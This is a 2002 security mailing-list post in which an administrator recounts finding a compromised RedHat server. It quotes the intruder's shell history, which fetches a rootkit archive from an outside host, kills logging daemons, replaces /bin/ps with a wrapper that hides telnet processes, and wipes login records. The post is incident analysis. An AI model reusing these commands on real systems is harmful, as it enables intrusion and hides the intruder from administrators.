Sloppy compromise

From: switched (
Date: Wed Mar 13 2002 - 09:23:47 PST

  • Next message: bukysat_private: "RemoteNC backdoors, attacks via ports 1433, 524, 139, 445, 21, destroyed files"

    I was dealing with a compromised server (RedHat 6.1) yesterday and it was
    utter crap.  After logging into the server the first thing I did was cat
    /etc/passwd.  At the bottom of /etc/passwd was the user "liq2" with a uid of
    0.  Not so clean.  The user "liq" had a uid of 501 I believe.  Both users
    had home directories in /home... so there was a /home/liq and /home/liq2.
    /home/liq contained a program, along with source, that scanned /24's for
    Cisco devices.  /home/liq2 had an untampered .bash_history with this in it:
    wget[-liquid-]/login.tgz; tar zfx login.tgz; cd login;
    pico rk.h; ./configure; make; make install; cd ..; rm -rf login; cd
    /home/liq; rm -rf login.tar.gz; wget (Link:;)
    pub/wu-ftpd/wu-ftpd-2.6.2.tar.gz; tar zxfv wu-ftpd-2.6.2.tar.gz; cd
    wu-ftpd-2.6.2;./configure;make;make install; cd ..; rm -rf wu-ftpd-2.6.2;
    rm -rf wu-ftpd-2.6.2.tar.gz; killall crond;killall syslogd;killall klogd;
    mv -f /bin/ps /bin/xps; echo "xps \$*|grep -vi 'in.telnetd'|grep -vi
    'grep'|sed s/'xps'/'ps'/g">/bin/ps; chown root.bin /bin/ps; chmod 0755
    /bin/ps; rm -f /var/run/utmp /var/run/wtmp; touch /var/run/utmp
    /var/run/wtmp; chmod 0 /var/run/utmp; chmod 0 /var/run/wtmp
    Very very sloppy... But you can also see this in there...
    mv -f /bin/ps /bin/xps; echo "xps \$*|grep -vi 'in.telnetd'|grep -vi
    'grep'|sed s/'xps'/'ps'/g">/bin/ps
    The attacker moved /bin/ps to /bin/xps and then echo'ed a script to ps which
    removes in.telnetd from showing up and changes the name of xps to ps.  Yes
    very crappy.  You have to be 2 years old to not catch that especially when
    sed shows up in the process list everytime you type "ps".  Moving right
    along I soon noticed I was on pty/2 but who showed me as the only user...
    interesting...  Ok, I typed xps and noticed that "./wu" was running on
    pty/1! Odd...  And then I noticed the system load average jump from .2 to
    2.0!  Now I noticed that "./wu" wasn't running but "./pscan" was now
    running.  At this point in time I decided enough was enough and had the
    machine unplugged.  Later on I went to look at it again from the console and
    noticed that these IPs had connected with telnet:
    They also weren't smart enough to remove or alter anything in /var/log/ and
    "last" showed them logging in with ftp and telnet! DOH! Further
    investigating found "wu" and "pscan" in /tmp/.or/
    So has anyone else seen a compromise such as this?  From what little
    investigating I did this is all I found modified... Looks like script
    kiddies were at work ;).
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